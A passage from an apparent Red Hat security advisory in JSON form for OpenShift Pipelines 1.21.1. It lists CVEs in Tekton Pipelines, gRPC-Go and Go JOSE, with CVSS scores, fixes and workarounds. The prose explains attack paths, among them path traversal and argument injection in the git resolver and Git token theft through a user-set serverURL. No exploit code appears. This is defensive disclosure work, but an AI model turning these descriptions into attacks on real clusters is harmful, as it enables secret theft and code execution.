"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_darwin",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@ppc64le",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_darwin",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_darwin",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@ppc64le",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "google.golang.org/grpc/grpc-go: google.golang.org/grpc/authz: gRPC-Go: Authorization bypass due to improper HTTP/2 path validation"
},
{
"cve": "CVE-2026-33211",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2026-03-24T00:02:20.093480+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2450554"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Tekton Pipelines, specifically in the Tekton Pipelines git resolver. A tenant with permissions to create ResolutionRequests can exploit a path traversal vulnerability via the `pathInRepo` parameter. This allows the tenant to read arbitrary files from the resolver pod\u0027s filesystem, leading to information disclosure, including sensitive ServiceAccount tokens. The contents of these files are returned in a base64-encoded format.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Tekton Pipelines: github.com/tektoncd/pipeline: Tekton Pipelines: Information disclosure via path traversal in git resolver",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker needs to have the permission to create ResolutionRequests (e.g., by creating TaskRuns or PipelineRuns that use the git resolver) within at least one specific namespace, limiting the exposure of this issue to authenticated users. Also, an attacker can read any file readable by the resolver pod process, including cluster secrets, allowing an escalation of privileges from namespace-scoped access to cluster-wide access. Due to these reasons, this vulnerability has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_darwin",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_darwin",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@ppc64le",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-33211"
},
{
"category": "external",
"summary": "RHBZ#2450554",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450554"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-33211",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33211"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33211",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33211"
},
{
"category": "external",
"summary": "https://github.com/tektoncd/pipeline/commit/10fa538f9a2b6d01c75138f1ed7ba3da0e34687c",
"url": "https://github.com/tektoncd/pipeline/commit/10fa538f9a2b6d01c75138f1ed7ba3da0e34687c"
},
{
"category": "external",
"summary": "https://github.com/tektoncd/pipeline/commit/318006c4e3a5",
"url": "https://github.com/tektoncd/pipeline/commit/318006c4e3a5"
},
{
"category": "external",
"summary": "https://github.com/tektoncd/pipeline/commit/3ca7bc6e6dd1d97f80b84f78370d91edaf023cbd",
"url": "https://github.com/tektoncd/pipeline/commit/3ca7bc6e6dd1d97f80b84f78370d91edaf023cbd"
},
{
"category": "external",
"summary": "https://github.com/tektoncd/pipeline/commit/961388fcf3374bc7656d28ab58ca84987e0a75ae",
"url": "https://github.com/tektoncd/pipeline/commit/961388fcf3374bc7656d28ab58ca84987e0a75ae"
},
{
"category": "external",
"summary": "https://github.com/tektoncd/pipeline/commit/b1fee65b88aa969069c14c120045e97c37d9ee5e",
"url": "https://github.com/tektoncd/pipeline/commit/b1fee65b88aa969069c14c120045e97c37d9ee5e"
},
{
"category": "external",
"summary": "https://github.com/tektoncd/pipeline/commit/cdb4e1e97a4f3170f9bc2cbfff83a6c8107bc3db",
"url": "https://github.com/tektoncd/pipeline/commit/cdb4e1e97a4f3170f9bc2cbfff83a6c8107bc3db"
},
{
"category": "external",
"summary": "https://github.com/tektoncd/pipeline/commit/ec7755031a183b345cf9e64bea0e0505c1b9cb78",
"url": "https://github.com/tektoncd/pipeline/commit/ec7755031a183b345cf9e64bea0e0505c1b9cb78"
},
{
"category": "external",
"summary": "https://github.com/tektoncd/pipeline/security/advisories/GHSA-j5q5-j9gm-2w5c",
"url": "https://github.com/tektoncd/pipeline/security/advisories/GHSA-j5q5-j9gm-2w5c"
}
],
"release_date": "2026-03-23T23:55:54.089000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-08T13:25:01+00:00",
"details": "Red Hat OpenShift Pipelines is a cloud-native, continuous integration and\ncontinuous delivery (CI/CD) solution based on Kubernetes resources.\nIt uses Tekton building blocks to automate deployments across multiple\nplatforms by abstracting away the underlying implementation details.\nTekton introduces a number of standard custom resource definitions (CRDs)\nfor defining CI/CD pipelines that are portable across Kubernetes distributions.",
"product_ids": [
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_darwin",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_darwin",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@ppc64le",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:24484"
},
{
"category": "workaround",
"details": "To mitigate this vulnerability, restrict the creation of ResolutionRequests to trusted users and service accounts. Implement strict Role-Based Access Control (RBAC) policies to limit which tenants can create TaskRuns or PipelineRuns that utilize the Tekton Pipelines git resolver. This reduces the exposure by preventing unauthorized access to the resolver pod\u0027s filesystem.",
"product_ids": [
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_darwin",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_darwin",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@ppc64le",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.6,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_darwin",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_darwin",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@ppc64le",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "Tekton Pipelines: github.com/tektoncd/pipeline: Tekton Pipelines: Information disclosure via path traversal in git resolver"
},
{
"cve": "CVE-2026-34986",
"cwe": {
"id": "CWE-131",
"name": "Incorrect Calculation of Buffer Size"
},
"discovery_date": "2026-04-06T17:01:34.639203+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2455470"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Go JOSE, a library for handling JSON Web Encryption (JWE) objects. A remote attacker could exploit this vulnerability by providing a specially crafted JWE object. When decrypting such an object, if a key wrapping algorithm is specified but the encrypted key field is empty, the application can crash. This leads to a denial of service (DoS), making the affected service unavailable to legitimate users.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/go-jose/go-jose/v3: github.com/go-jose/go-jose/v4: Go JOSE: Denial of Service via crafted JSON Web Encryption (JWE) object",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_darwin",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_darwin",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@ppc64le",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-34986"
},
{
"category": "external",
"summary": "RHBZ#2455470",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455470"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-34986",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34986"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-34986",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34986"
},
{
"category": "external",
"summary": "https://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8",
"url": "https://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8"
},
{
"category": "external",
"summary": "https://pkg.go.dev/github.com/go-jose/go-jose/v4#pkg-constants",
"url": "https://pkg.go.dev/github.com/go-jose/go-jose/v4#pkg-constants"
}
],
"release_date": "2026-04-06T16:22:45.353000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-08T13:25:01+00:00",
"details": "Red Hat OpenShift Pipelines is a cloud-native, continuous integration and\ncontinuous delivery (CI/CD) solution based on Kubernetes resources.\nIt uses Tekton building blocks to automate deployments across multiple\nplatforms by abstracting away the underlying implementation details.\nTekton introduces a number of standard custom resource definitions (CRDs)\nfor defining CI/CD pipelines that are portable across Kubernetes distributions.",
"product_ids": [
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_darwin",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_darwin",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@ppc64le",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:24484"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_darwin",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_darwin",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@ppc64le",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_darwin",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_darwin",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@ppc64le",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "github.com/go-jose/go-jose/v3: github.com/go-jose/go-jose/v4: Go JOSE: Denial of Service via crafted JSON Web Encryption (JWE) object"
},
{
"cve": "CVE-2026-40161",
"cwe": {
"id": "CWE-918",
"name": "Server-Side Request Forgery (SSRF)"
},
"discovery_date": "2026-04-21T17:02:07.015859+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2460173"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Tekton Pipelines. A tenant with permissions to create TaskRun or PipelineRun resources can exploit this vulnerability. By omitting the Git API token parameter and pointing the serverURL to an attacker-controlled endpoint, the system-configured Git API token (such as a GitHub Personal Access Token or GitLab token) can be sent to the attacker. This information disclosure allows for the exfiltration of sensitive API tokens.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/tektoncd/pipeline: Tekton Pipelines: Information disclosure of Git API token via user-controlled serverURL",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Moderate impact information disclosure flaw affects Tekton Pipelines. A user with permissions to create TaskRun or PipelineRun resources could exfiltrate the system-configured Git API token by directing the serverURL to an attacker-controlled endpoint and omitting the token parameter. This vulnerability doesn\u0027t affect a couple of Red Hat supported products as it\u0027s using a Pipelines version previously from 1.0.0, where the affected code is not present.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_darwin",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_darwin",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@ppc64le",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-40161"
},
{
"category": "external",
"summary": "RHBZ#2460173",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460173"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-40161",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-40161"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-40161",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40161"
},
{
"category": "external",
"summary": "https://github.com/tektoncd/pipeline/issues/9608",
"url": "https://github.com/tektoncd/pipeline/issues/9608"
},
{
"category": "external",
"summary": "https://github.com/tektoncd/pipeline/issues/9609",
"url": "https://github.com/tektoncd/pipeline/issues/9609"
},
{
"category": "external",
"summary": "https://github.com/tektoncd/pipeline/security/advisories/GHSA-wjxp-xrpv-xpff",
"url": "https://github.com/tektoncd/pipeline/security/advisories/GHSA-wjxp-xrpv-xpff"
}
],
"release_date": "2026-04-21T16:26:27.381000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-08T13:25:01+00:00",
"details": "Red Hat OpenShift Pipelines is a cloud-native, continuous integration and\ncontinuous delivery (CI/CD) solution based on Kubernetes resources.\nIt uses Tekton building blocks to automate deployments across multiple\nplatforms by abstracting away the underlying implementation details.\nTekton introduces a number of standard custom resource definitions (CRDs)\nfor defining CI/CD pipelines that are portable across Kubernetes distributions.",
"product_ids": [
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_darwin",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_darwin",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@ppc64le",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:24484"
},
{
"category": "workaround",
"details": "To mitigate this issue, ensure that the Git API token parameter is always explicitly provided when configuring Tekton Pipelines. Additionally, restrict permissions for creating TaskRun or PipelineRun resources to only trusted users to limit the attack surface. Review and enforce policies that prevent the use of user-controlled serverURLs without proper token authentication. Configuration changes may require a restart or reload of affected services to take effect.",
"product_ids": [
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_darwin",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_darwin",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@ppc64le",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_darwin",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_darwin",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@ppc64le",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "github.com/tektoncd/pipeline: Tekton Pipelines: Information disclosure of Git API token via user-controlled serverURL"
},
{
"cve": "CVE-2026-40938",
"cwe": {
"id": "CWE-88",
"name": "Improper Neutralization of Argument Delimiters in a Command (\u0027Argument Injection\u0027)"
},
"discovery_date": "2026-04-21T21:02:16.557479+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2460292"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Tekton Pipelines, a system for declaring continuous integration/continuous delivery (CI/CD) pipelines. An authenticated user, able to submit `ResolutionRequest` objects, can exploit a vulnerability by injecting malicious commands into the git resolver\u0027s revision parameter. This allows for the execution of unauthorized programs on the resolver pod. Successful exploitation can lead to the exfiltration of all cluster-wide secrets, resulting in significant information disclosure.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/tektoncd/pipeline: Tekton Pipelines: Arbitrary code execution and secret exfiltration via malicious git commands",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Important flaw in Tekton Pipelines allows an authenticated user to achieve arbitrary code execution on the resolver pod by injecting malicious commands into the git resolver\u0027s revision parameter. This vulnerability happens because the `revision` parameter is passed as a positional argument to the `git fetch` command without any previous validation whether the parameter\u0027s value doesn\u0027t start with `-` character. Combining this lack of validation with the fact the function which validates the repository URL explicitly allows a repository URL to being with `/`, translating to a local filesystem. An attacker with enough privileges to perform an operation which trigger resolvers to use the `ResolutionRequest` function can \nchain both behaviors to trick Tekton Pipelines to load and execute an arbitrary binary on the resolver pod.\n\nExploring this vulnerability may be considered of a high complexity as an attacker needs to either know an existing valid git repository located at a predicable path already in the resolver pod or a default URL configuration pointing to a local filesystem\u0027s path.\n \nA successful exploitation of the flaw can lead to the exfiltration of all cluster-wide secrets, posing a significant risk to the integrity and confidentiality of the OpenShift environment. Additionally, depending on the data included in the `kubeconfig` files, an attacker may achieve privilege escalation or perform lateral movements within the targeted cluster.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_darwin",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_darwin",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@ppc64le",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-40938"
},
{
"category": "external",
"summary": "RHBZ#2460292",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460292"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-40938",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-40938"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-40938",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40938"
},
{
"category": "external",
"summary": "https://github.com/tektoncd/pipeline/releases/tag/v1.11.1",
"url": "https://github.com/tektoncd/pipeline/releases/tag/v1.11.1"
},
{
"category": "external",
"summary": "https://github.com/tektoncd/pipeline/security/advisories/GHSA-94jr-7pqp-xhcq",
"url": "https://github.com/tektoncd/pipeline/security/advisories/GHSA-94jr-7pqp-xhcq"
}
],
"release_date": "2026-04-21T20:45:24.658000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-08T13:25:01+00:00",
"details": "Red Hat OpenShift Pipelines is a cloud-native, continuous integration and\ncontinuous delivery (CI/CD) solution based on Kubernetes resources.\nIt uses Tekton building blocks to automate deployments across multiple\nplatforms by abstracting away the underlying implementation details.\nTekton introduces a number of standard custom resource definitions (CRDs)\nfor defining CI/CD pipelines that are portable across Kubernetes distributions.",
"product_ids": [
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_darwin",
